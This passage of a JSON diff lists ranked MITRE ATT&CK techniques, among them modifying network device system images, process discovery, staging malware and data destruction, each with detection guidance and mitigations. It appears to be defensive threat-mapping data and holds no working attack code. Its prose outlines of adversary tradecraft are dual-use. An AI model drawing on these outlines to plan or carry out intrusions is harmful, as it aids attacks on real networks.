Run-Time Memory Verification)", + "score": 0.46190476190476193, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + } + ], + "subtechniques": [ + { + "tid": "T1601.001", + "name": "Modify System Image: Patch System Image", + "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the ROMMONkit method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via Weaken Encryption, authentication, via Network Device Authentication, and perimeter defenses, via Network Boundary Bridging. Adding new capabilities for the adversary’s purpose include Keylogging, Multi-hop Proxy, and Port Knocking.\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with Downgrade System Image, one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via TFTP Boot. \nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with ROMMONkit to achieve persistence. ", + "url": "https://attack.mitre.org/techniques/T1601/001", + "detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + } + ] + }, + { + "tid": "T1601.002", + "name": "Modify System Image: Downgrade System Image", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as Weaken Encryption. Downgrading of a system image can be done on its own, or it can be used in conjunction with Patch System Image. ", + "url": "https://attack.mitre.org/techniques/T1601/002", + "detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with Patch System Image, it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + } + ] + } + ] + }, + { + "rank": 139, + "tid": "T1057", + "name": "Process Discovery", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIn Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or Get-Process via PowerShell. Information about processes can also be extracted from the output of Native API calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.", + "url": "https://attack.mitre.org/techniques/T1057", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.4606304028571429, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 140, + "tid": "T1596", + "name": "Search Open Technical Databases", + "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1596", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.45990000000000003, + "network_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1596.001", + "name": "Search Open Technical Databases: DNS/Passive DNS", + "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Search Victim-Owned Websites or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1596/001", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.002", + "name": "Search Open Technical Databases: WHOIS", + "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Phishing for Information), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1596/002", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.003", + "name": "Search Open Technical Databases: Digital Certificates", + "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Phishing for Information), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1596/003", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.004", + "name": "Search Open Technical Databases: CDNs", + "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Drive-by Compromise).", + "url": "https://attack.mitre.org/techniques/T1596/004", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.005", + "name": "Search Open Technical Databases: Scan Databases", + "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).", + "url": "https://attack.mitre.org/techniques/T1596/005", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 141, + "tid": "T1608", + "name": "Stage Capabilities", + "description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (Develop Capabilities) or obtained (Obtain Capabilities) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n
    \n
  • Staging web resources necessary to conduct Drive-by Compromise when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
    • \n
  • Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
    • \n
  • Uploading malware or tools to a location accessible to a victim network to enable Ingress Tool Transfer.(Citation: Volexity Ocean Lotus November 2020)
    • \n
  • Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: Asymmetric Cryptography with Web Protocols).(Citation: DigiCert Install SSL Cert)
    • \n
", + "url": "https://attack.mitre.org/techniques/T1608", + "detection": "If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.", + "score": 0.45990000000000003, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1608.001", + "name": "Stage Capabilities: Upload Malware", + "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via User Execution. Masquerading may increase the chance of users mistakenly executing these files.", + "url": "https://attack.mitre.org/techniques/T1608/001", + "detection": "If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as User Execution or Ingress Tool Transfer.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.002", + "name": "Stage Capabilities: Upload Tool", + "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.\nTools may be placed on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.", + "url": "https://attack.mitre.org/techniques/T1608/002", + "detection": "If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as Ingress Tool Transfer.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.003", + "name": "Stage Capabilities: Install Digital Certificate", + "description": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \nAdversaries can obtain digital certificates (see Digital Certificates) or create self-signed certificates (see Digital Certificates). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure).", + "url": "https://attack.mitre.org/techniques/T1608/003", + "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\nDetection efforts may be focused on related behaviors, such as Web Protocols or Asymmetric Cryptography.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.004", + "name": "Stage Capabilities: Drive-by Target", + "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise. In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as Application Access Token. Prior to Drive-by Compromise, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure).\nAdversaries may upload or inject malicious web content, such as JavaScript, into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in Gather Victim Host Information) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack.\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure (Domains) to help facilitate Drive-by Compromise.", + "url": "https://attack.mitre.org/techniques/T1608/004", + "detection": "If infrastructure or patterns in the malicious web content utilized to deliver a Drive-by Compromise have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as Drive-by Compromise or Exploitation for Client Execution.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.005", + "name": "Stage Capabilities: Link Target", + "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in Malicious Link. Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in Spearphishing Link) or a phish to gain initial access to a system (as in Spearphishing Link), an adversary must set up the resources for a link target for the spearphishing link. \nTypically, the resources for a link target will be an HTML page that may include some client-side script such as JavaScript to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during Spearphishing Link.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also Upload Malware and have the link target point to malware for download/execution by the user.\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure (Domains) to help facilitate Malicious Link. Link shortening services can also be employed.", + "url": "https://attack.mitre.org/techniques/T1608/005", + "detection": "If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during Spearphishing Link, Spearphishing Link, or Malicious Link.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 142, + "tid": "T1485", + "name": "Data Destruction", + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)", + "url": "https://attack.mitre.org/techniques/T1485", + "detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as SDelete. Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.\nIn cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity.", + "score": 0.450042306796174, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "subtechniques": [] + }, + { + "rank": 143, + "tid": "T1092", + "name": "Communication Through Removable Media", + "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.", + "url": "https://attack.mitre.org/techniques/T1092", + "detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.", + "score": 0.44285714285714284, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [] + }, + { + "rank": 144, + "tid": "T1202", + "name": "Indirect Command Execution", + "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\nAdversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.", + "url": "https://attack.mitre.org/techniques/T1202", + "detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)", + "score": 0.42711615885142856, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 145, + "tid": "T1561", + "name": "Disk 